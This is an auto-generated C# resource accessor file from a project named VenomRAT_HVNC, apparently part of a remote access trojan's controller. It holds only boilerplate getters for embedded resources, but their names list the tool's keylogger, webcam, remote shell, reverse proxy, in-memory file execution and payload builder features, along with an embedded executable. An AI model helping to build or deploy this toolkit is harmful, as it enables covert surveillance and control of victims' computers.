//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace VenomRAT_HVNC.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("VenomRAT_HVNC.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] HVNC_FrmBuilder {
            get {
                object obj = ResourceManager.GetObject("HVNC_FrmBuilder", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] HVNC_FrmMain {
            get {
                object obj = ResourceManager.GetObject("HVNC_FrmMain", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] HVNC_FrmMassUpdate {
            get {
                object obj = ResourceManager.GetObject("HVNC_FrmMassUpdate", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] HVNC_FrmTransfer {
            get {
                object obj = ResourceManager.GetObject("HVNC_FrmTransfer", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] HVNC_FrmURL {
            get {
                object obj = ResourceManager.GetObject("HVNC_FrmURL", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Quasar_Server_Forms_FrmReverseProxy {
            get {
                object obj = ResourceManager.GetObject("Quasar_Server_Forms_FrmReverseProxy", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Form1 {
            get {
                object obj = ResourceManager.GetObject("Server_Form1", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormAbout {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormAbout", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormAudio {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormAudio", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormBuilder {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormBuilder", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormCertificate {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormCertificate", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormDownloadFile {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormDownloadFile", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormFileManager {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormFileManager", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormFileSearcher {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormFileSearcher", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormFun {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormFun", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormKeylogger {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormKeylogger", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormLogin {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormLogin", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormNetstat {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormNetstat", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormPorts {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormPorts", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormProcessManager {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormProcessManager", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRegistryEditor {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRegistryEditor", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRegValueEditBinary {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRegValueEditBinary", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRegValueEditMultiString {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRegValueEditMultiString", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRegValueEditString {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRegValueEditString", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRegValueEditWord {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRegValueEditWord", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormRemoteDesktop {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormRemoteDesktop", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormShell {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormShell", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Forms_FormWebcam {
            get {
                object obj = ResourceManager.GetObject("Server_Forms_FormWebcam", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_FormSendFileToMemory {
            get {
                object obj = ResourceManager.GetObject("Server_FormSendFileToMemory", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Server_Properties_Resources {
            get {
                object obj = ResourceManager.GetObject("Server_Properties_Resources", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] VenomRAT_HVNC_exe {
            get {
                object obj = ResourceManager.GetObject("VenomRAT_HVNC_exe", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
